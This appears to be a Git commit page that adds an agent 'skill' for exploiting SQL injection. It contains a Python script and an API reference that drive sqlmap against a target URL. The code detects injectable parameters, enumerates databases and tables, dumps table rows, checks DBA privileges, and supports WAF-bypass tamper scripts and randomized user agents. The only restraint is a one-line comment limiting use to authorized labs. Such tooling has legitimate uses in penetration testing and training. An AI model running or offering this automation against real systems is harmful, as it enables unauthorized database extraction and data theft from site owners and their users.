creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 13:44:56 +03:00
Code Issues Packages Projects Releases Wiki Activity

Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills

Browse Source 
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
This commit is contained in:
mukul975
2026-03-10 21:02:12 +01:00
parent c74d52fa30
commit 27c6414ca5
1390 changed files with 106806 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
skills/exploiting-sql-injection-with-sqlmap/LICENSE
+21
View File
@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 Anthropic Agent Skills Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
skills/exploiting-sql-injection-with-sqlmap/references/api-reference.md
+74
View File
@@ -0,0 +1,74 @@
# API Reference: sqlmap Automation Agent
## Dependencies
| Library | Version | Purpose |
|---------|---------|---------|
| sqlmap | >=1.7 | SQL injection detection and exploitation (subprocess) |
## CLI Usage
```bash
# Detection scan
python scripts/agent.py --url "https://target.com/page?id=1" --param id --action detect
# Enumerate databases
python scripts/agent.py --url "https://target.com/page?id=1" --action dbs
# List tables
python scripts/agent.py --url "https://target.com/page?id=1" --action tables --database target_db
# Dump table rows
python scripts/agent.py --url "https://target.com/page?id=1" --action dump \
--database target_db --table users
# Check privileges
python scripts/agent.py --url "https://target.com/page?id=1" --action privs
```
## Functions
### `find_sqlmap() -> str`
Searches common paths for the sqlmap binary.
### `run_detection_scan(sqlmap_bin, url, param, request_file, cookie, tamper) -> dict`
Runs `sqlmap --batch --random-agent` and parses output for injectability, DB type, and techniques.
### `enumerate_databases(sqlmap_bin, url, param, cookie) -> list`
Runs `sqlmap --dbs` and extracts database names from output.
### `enumerate_tables(sqlmap_bin, url, database, param, cookie) -> list`
Runs `sqlmap -D db --tables` and parses table names.
### `dump_table(sqlmap_bin, url, database, table, columns, limit, param, cookie) -> dict`
Runs `sqlmap -D db -T tbl --dump --start=1 --stop=N`.
### `check_privileges(sqlmap_bin, url, param, cookie) -> dict`
Runs `--current-user --current-db --is-dba` to assess DB privileges.
## sqlmap Flags Used
| Flag | Purpose |
|------|---------|
| `--batch` | Non-interactive mode |
| `--random-agent` | Randomize User-Agent header |
| `-p` | Specify injectable parameter |
| `--tamper` | Apply WAF bypass tamper scripts |
| `--dbs` | Enumerate databases |
| `--tables` | Enumerate tables |
| `--dump` | Extract table data |
| `--is-dba` | Check DBA privileges |
## Output Schema
```json
{
"action": "detect",
"url": "https://target.com/page?id=1",
"result": {
"injectable": true,
"database": "MySQL",
"techniques": ["boolean-based", "UNION query"]
}
}
```
skills/exploiting-sql-injection-with-sqlmap/scripts/agent.py
+218
View File
@@ -0,0 +1,218 @@
#!/usr/bin/env python3
# For authorized testing in lab/CTF environments only
"""sqlmap automation agent for orchestrating SQL injection scans via subprocess."""
import argparse
import json
import logging
import os
import subprocess
import sys
from datetime import datetime
from typing import List, Optional
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger(__name__)
def find_sqlmap() -> str:
"""Locate the sqlmap executable."""
for path in ["sqlmap", "sqlmap.py", "/usr/bin/sqlmap", "/usr/local/bin/sqlmap"]:
try:
subprocess.run([path, "--version"], capture_output=True, timeout=5)
return path
except (FileNotFoundError, subprocess.TimeoutExpired):
continue
sys.exit("sqlmap not found. Install: pip install sqlmap")
def run_detection_scan(sqlmap_bin: str, url: str, param: Optional[str] = None,
request_file: Optional[str] = None,
cookie: str = "", tamper: str = "") -> dict:
"""Run sqlmap detection scan and parse results."""
cmd = [sqlmap_bin, "--batch", "--random-agent", "--output-dir=/tmp/sqlmap_out"]
if request_file:
cmd.extend(["-r", request_file])
else:
cmd.extend(["-u", url])
if param:
cmd.extend(["-p", param])
if cookie:
cmd.extend(["--cookie", cookie])
if tamper:
cmd.extend(["--tamper", tamper])
logger.info("Running: %s", " ".join(cmd))
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
output = result.stdout
injectable = "is vulnerable" in output.lower() or "injectable" in output.lower()
db_type = _extract_db_type(output)
techniques = _extract_techniques(output)
return {
"scan_type": "detection",
"url": url or request_file,
"injectable": injectable,
"database": db_type,
"techniques": techniques,
"exit_code": result.returncode,
}
def enumerate_databases(sqlmap_bin: str, url: str, param: Optional[str] = None,
cookie: str = "") -> List[str]:
"""Enumerate databases using sqlmap --dbs."""
cmd = [sqlmap_bin, "-u", url, "--dbs", "--batch", "--random-agent"]
if param:
cmd.extend(["-p", param])
if cookie:
cmd.extend(["--cookie", cookie])
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
databases = []
in_db_section = False
for line in result.stdout.split("\n"):
if "available databases" in line.lower():
in_db_section = True
continue
if in_db_section and line.strip().startswith("[*]"):
db_name = line.strip().replace("[*] ", "")
databases.append(db_name)
elif in_db_section and not line.strip():
break
logger.info("Found %d databases", len(databases))
return databases
def enumerate_tables(sqlmap_bin: str, url: str, database: str,
param: Optional[str] = None, cookie: str = "") -> List[str]:
"""Enumerate tables in a specific database."""
cmd = [sqlmap_bin, "-u", url, "-D", database, "--tables",
"--batch", "--random-agent"]
if param:
cmd.extend(["-p", param])
if cookie:
cmd.extend(["--cookie", cookie])
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
tables = []
for line in result.stdout.split("\n"):
stripped = line.strip()
if stripped.startswith("| ") and not stripped.startswith("+-"):
table_name = stripped.strip("| ").strip()
if table_name and table_name != "Table":
tables.append(table_name)
logger.info("Found %d tables in %s", len(tables), database)
return tables
def dump_table(sqlmap_bin: str, url: str, database: str, table: str,
columns: Optional[List[str]] = None, limit: int = 10,
param: Optional[str] = None, cookie: str = "") -> dict:
"""Dump rows from a specific table with optional column and row limit."""
cmd = [sqlmap_bin, "-u", url, "-D", database, "-T", table, "--dump",
"--start=1", f"--stop={limit}", "--batch", "--random-agent"]
if columns:
cmd.extend(["-C", ",".join(columns)])
if param:
cmd.extend(["-p", param])
if cookie:
cmd.extend(["--cookie", cookie])
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
return {
"database": database,
"table": table,
"limit": limit,
"output": result.stdout[-2000:] if len(result.stdout) > 2000 else result.stdout,
"exit_code": result.returncode,
}
def check_privileges(sqlmap_bin: str, url: str, param: Optional[str] = None,
cookie: str = "") -> dict:
"""Check current database user and DBA privileges."""
cmd = [sqlmap_bin, "-u", url, "--current-user", "--current-db", "--is-dba",
"--batch", "--random-agent"]
if param:
cmd.extend(["-p", param])
if cookie:
cmd.extend(["--cookie", cookie])
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
output = result.stdout
current_user = _extract_value(output, "current user")
current_db = _extract_value(output, "current database")
is_dba = "true" in output.lower().split("current user is DBA")[-1][:20].lower() if "current user is DBA" in output else False
return {"current_user": current_user, "current_db": current_db, "is_dba": is_dba}
def _extract_db_type(output: str) -> str:
for db in ["MySQL", "PostgreSQL", "Microsoft SQL Server", "Oracle", "SQLite"]:
if db.lower() in output.lower():
return db
return "unknown"
def _extract_techniques(output: str) -> List[str]:
techniques = []
for tech in ["boolean-based", "error-based", "UNION query", "stacked queries",
"time-based", "inline query"]:
if tech.lower() in output.lower():
techniques.append(tech)
return techniques
def _extract_value(output: str, label: str) -> str:
for line in output.split("\n"):
if label.lower() in line.lower():
parts = line.split(":")
if len(parts) > 1:
return parts[-1].strip().strip("'\"")
return ""
def main():
parser = argparse.ArgumentParser(description="sqlmap Automation Agent")
parser.add_argument("--url", required=True, help="Target URL with injectable param")
parser.add_argument("--param", help="Specific parameter to test")
parser.add_argument("--cookie", default="", help="Cookie header value")
parser.add_argument("--tamper", default="", help="Tamper scripts (comma-separated)")
parser.add_argument("--action", choices=["detect", "dbs", "tables", "dump", "privs"],
default="detect")
parser.add_argument("--database", help="Database name for table/dump actions")
parser.add_argument("--table", help="Table name for dump action")
parser.add_argument("--output", default="sqlmap_report.json")
args = parser.parse_args()
sqlmap_bin = find_sqlmap()
report = {"action": args.action, "url": args.url, "timestamp": datetime.utcnow().isoformat()}
if args.action == "detect":
report["result"] = run_detection_scan(sqlmap_bin, args.url, args.param,
cookie=args.cookie, tamper=args.tamper)
elif args.action == "dbs":
report["databases"] = enumerate_databases(sqlmap_bin, args.url, args.param, args.cookie)
elif args.action == "tables" and args.database:
report["tables"] = enumerate_tables(sqlmap_bin, args.url, args.database, args.param, args.cookie)
elif args.action == "dump" and args.database and args.table:
report["dump"] = dump_table(sqlmap_bin, args.url, args.database, args.table,
param=args.param, cookie=args.cookie)
elif args.action == "privs":
report["privileges"] = check_privileges(sqlmap_bin, args.url, args.param, args.cookie)
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
logger.info("Report saved to %s", args.output)
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()